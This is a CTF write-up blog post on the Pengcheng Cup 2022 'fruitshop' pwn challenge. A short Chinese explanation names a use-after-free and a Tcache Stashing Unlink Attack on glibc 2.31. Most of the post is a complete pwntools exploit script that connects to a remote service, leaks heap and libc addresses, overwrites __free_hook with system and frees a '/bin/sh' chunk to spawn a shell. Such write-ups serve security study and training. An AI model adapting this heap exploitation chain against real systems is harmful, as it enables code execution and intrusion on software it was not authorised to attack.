ha1vk's blog
0%

鹏城杯2022_fruitshop

发表于 分类于

delete没有清空指针

Add只能malloc固定规格size到堆

其中add_durian使用calloc,而其他使用malloc,且能够通过切割unsorted bin,产生0x120的small bin chunk

于是可以使用Tcache Stashing Unlink Attack修改tcache_max阀值,将所有的chunk以tcache的形式管理,就能够使用tcache attack进行任意地址分配

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
#coding:utf8
from pwn import *

#sh = process('./fruitshop_patch')
#sh = process('./fruitshop')
sh = remote('192.168.1.107',8888)
libc = ELF('./libc-2.31.so')

def add(type,index,content):
   sh.sendlineafter('>','1')
   sh.sendlineafter(':',type)
   sh.sendlineafter(':',str(index))
   sh.sendafter(':',content)


def edit(type,index,content):
   sh.sendlineafter('>','2')
   sh.sendlineafter(':',type)
   sh.sendlineafter(':\n',str(index))
   if type == 'Apple':
      if len(content) < 0x200:
         sh.sendafter('Do~',content)
         sh.sendafter('Re~','\n')
         sh.sendafter('Mi~','\n')
         sh.sendafter('Fa~','\n')
      else:
         sh.sendafter('Do~',content[0:0x200])
         sh.sendafter('Re~',content[0x200:0xcb0])
         sh.sendafter('Mi~',content[0xcb0:])
         #sh.sendlineafter('Fa~',content[0xdb0:0xdd0])
         #sh.sendlineafter('Fa~','')

   else:
      sh.sendafter('\n',content)

def show(type,index):
   sh.sendlineafter('>','3')
   sh.sendlineafter(':',type)
   sh.sendlineafter(':\n',str(index))

def delete(type,index):
   sh.sendlineafter('>','4')
   sh.sendlineafter(':',type)
   sh.sendlineafter(':\n',str(index))

context.log_level = 'debug'

add('Apple',0,'a'*0xdd0)

for i in range(6):
   add('Durian',0,'b'*0x110)
   delete('Durian',0)

add('Apple',2,'b'*0xdd0)

show('Durian',0)
sh.recvuntil('Content is')
heap_addr = u64(sh.recv(8))
print 'heap_addr=',hex(heap_addr)


delete('Apple',0)
show('Apple',0)
sh.recvuntil('Content is')
libc_base = u64(sh.recv(8)) - 0x1ecbe0
tcache_max = libc_base + 0x1ec2d0
system_addr = libc_base +  libc.sym['system']
free_hook_addr = libc_base + libc.sym['__free_hook']
print 'tcache_max=',hex(tcache_max)

print 'libc_base=',hex(libc_base)
print 'free_hook_addr=',hex(free_hook_addr)

sh.recv()
sh.sendline('')

add('Banana',0,'b'*0xcb0)

add('Apple',1,'a'*0xdd0)
add('Banana',1,'b'*0xcb0)

delete('Apple',1)
add('Banana',1,'b'*0xcb0)

add('Apple',0,'a'*0xdd0)

#raw_input()
#edit('Apple',1,'a'*0xcb0 + p64(0) + p64(0x121) + p64(heap_addr - 0x5b0) + p64(tcache_max - 0x10))
sh.sendlineafter('>','2')
sh.sendlineafter(':','Apple')
sh.sendlineafter(':\n','1')
sh.sendafter('Do~','a\n')
sh.sendafter('Re~','r\n')
sh.sendafter('Mi~',p64(0) + p64(0x121) + p64(heap_addr - 0x5b0) + p64(tcache_max - 0x10) + '\n')
sh.sendafter('Fa~','r\n')


#Tcache Stashing Unlink Attack修改tcache_max
add('Durian',0,'d'*0x110)

#tcache attack
delete('Apple',0)
delete('Apple',2)

edit('Apple',2,p64(free_hook_addr) + '\n')


add('Apple',0,'/bin/sh\x00\n')
add('Apple',1,p64(system_addr) + '\n')

#getshell
delete('Apple',0)

sh.interactive()